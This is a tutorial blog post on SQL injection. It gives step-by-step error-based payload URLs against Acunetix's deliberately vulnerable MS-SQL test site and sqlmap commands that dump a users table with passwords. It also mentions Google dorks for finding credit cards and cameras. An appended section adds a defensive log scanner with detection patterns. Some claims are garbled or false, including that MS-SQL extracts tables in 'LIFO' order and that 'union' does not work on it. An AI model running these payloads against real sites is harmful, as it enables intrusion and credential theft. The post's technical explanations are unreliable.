
Error Based Injection


By: D3f3nd3r

January 18, 2018

Error-based injection mainly targets Microsoft-powered technologies such as ASP and ASPX. It works against an MS-SQL database and is a bit different from the previous attack, union-based injection, which was deployed against a MySQL database.

• Here the database will be an MS-SQL database:
MySQL : PHP
MS-SQL : .asp or .aspx

Difference between Union and Error Based Injection

1. Extracting all tables at one time from the database
• information_schema.tables will not return you the entire table names.
2. MS SQL works on the STACK principle, meaning LAST IN FIRST OUT.
• Hence the table which is on the top of the stack is going to be fetched first at the time of extraction.
3. Functions like database() and version() do not work in MS-SQL.
4. "order by" or "union" does not work on MS-SQL.

Target: testasp.vulnweb.com
• It is a legal platform provided by Acunetix for security testing.

Step 1: Find a GET parameter in the URL of the website.
• We have to look for any something=something.
• E.g. id=1 or pid=16 or product=milk
https://testasp.vulnweb.com/showforum.asp?id=0

Step 2: Check the exception handling.
http://testasp.vulnweb.com/showforum.asp?id=0'

Step 3: Check the conditions required for the further attack.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;

Note: Error-based injection works on the LIFO rule: last in, first out.
For example, if we have a database with tables like the following:
threads -> 1
teacher -> 2
classes -> 3
fee -> 4
users -> 5

Step 4: Get the table names.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables));
• Got table: 'threads' X
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));
• Target: 'users'

Step 5: Get the respective columns of the users table.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));
• Target columns: uname, upass

Step 6: Get the uname and upass.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 upass from users));
• uname: admin
• upass: none

Stack Based Query

Requirements
1. SQLMAP: a Python-script-based automated vulnerability assessment and penetration testing tool.
2. Kali Linux: sqlmap is built into Kali Linux.
• You can also download the sqlmap version for Windows from its official website.

Introduction to SQL MAP
------------------------
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Step 1: Open your Linux terminal.

Step 2:
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dbs

Output: Here we can see we got the databases below.
[09:54:16] [INFO] fetching database names
Available databases [2]:
[*] acuart <------- Target Database
[*] information_schema

Step 3: Get the tables of the database.
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables

Here we got all the tables available in the acuart database.
Output:
[09:58:49] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |-------> Target Table
+-----------+

Step 4: Get the columns of the users table.
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -T users --columns

Output:
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |---> Target
| phone   | varchar(100) |
| uname   | varchar(100) |---> Target
+---------+--------------+

Step 5: Get the data from the columns of the above table.
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -U test -T users --dump

Output:
Database: acuart
Table: users
[1 entry]
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
| cc                        | name         | cart                             | pass | uname | phone   | email              | address |
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | jurandir@gmail.com | foda-se |
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+

Google Hacking Database

Johnny I Hack Stuff : Searched --> Google --> Credit Cards

• Google Dorks
Filtration of results from the Google database.
#inurl -- Green line in Google Search
#intitle -- Blue line in Google Search
#intext -- Black line in Google Search
#filetype -- Type of file that we need, i.e. pdf, ppt, docs etc.

• IP CAMERA

Searching tools
www.exploit-db.com
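
Added example (not part of the original post): a log check a defender can run for the requests produced by the error-based injection steps and the sqlmap run above, namely the lone-quote exception probe, convert(int,(select ...)) casts, information_schema enumeration and sqlmap's default User-Agent. The five-field log layout, the rule names and the sample lines are assumptions constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: IIS-style lines trimmed to method, path, query, client IP, User-Agent.
# IIS writes spaces inside a field as '+'. Addresses are documentation ranges.
SAMPLE_LOG = """\
GET /showforum.asp id=0 203.0.113.10 Mozilla/5.0
GET /showforum.asp id=0' 203.0.113.10 Mozilla/5.0
GET /showforum.asp id=0+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 203.0.113.10 Mozilla/5.0
GET /showforum.asp id=0%20and%201%3Dconvert%28int%2C%28select%20top%201%20upass%20from%20users%29%29 203.0.113.10 Mozilla/5.0
GET /search.php test=query 198.51.100.7 sqlmap/0.0+(constructed)
GET /showforum.asp id=12 198.51.100.99 Mozilla/5.0
"""

# Rules applied to the URL-decoded query string (rule names are hypothetical).
QUERY_RULES = {
    # A subquery forced through a type conversion: the error-leak primitive.
    "cast-of-subselect": re.compile(
        r"\b(?:convert\s*\(\s*\w+\s*,|cast\s*\()\s*\(\s*select\b", re.I),
    # Metadata views have no business appearing in a request parameter.
    "schema-enumeration": re.compile(
        r"\binformation_schema\.(?:tables|columns)\b", re.I),
    # Weak signal on its own: a value ending in a lone quote (exception probe).
    "trailing-quote-probe": re.compile(r"=[^&']*'(?:&|$)"),
}
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)  # sqlmap's default User-Agent prefix


def scan(log_text):
    """Return [(line_no, client_ip, [rule, ...])] for every flagged request."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split(None, 4)
        if len(parts) != 5:
            continue  # skip malformed or truncated lines
        _method, _path, query, client_ip, user_agent = parts
        decoded = unquote_plus(query)  # undo %xx and '+' before matching
        hits = [name for name, rx in QUERY_RULES.items() if rx.search(decoded)]
        if SQLMAP_UA.search(user_agent):
            hits.append("sqlmap-user-agent")
        if hits:
            findings.append((line_no, client_ip, hits))
    return findings


if __name__ == "__main__":
    for line_no, client_ip, hits in scan(SAMPLE_LOG):
        print(f"line {line_no}: {client_ip} -> {', '.join(hits)}")
```

Detection like this is a backstop: the root fix is parameterized queries plus generic error pages, so a failed conversion never returns database text to the client.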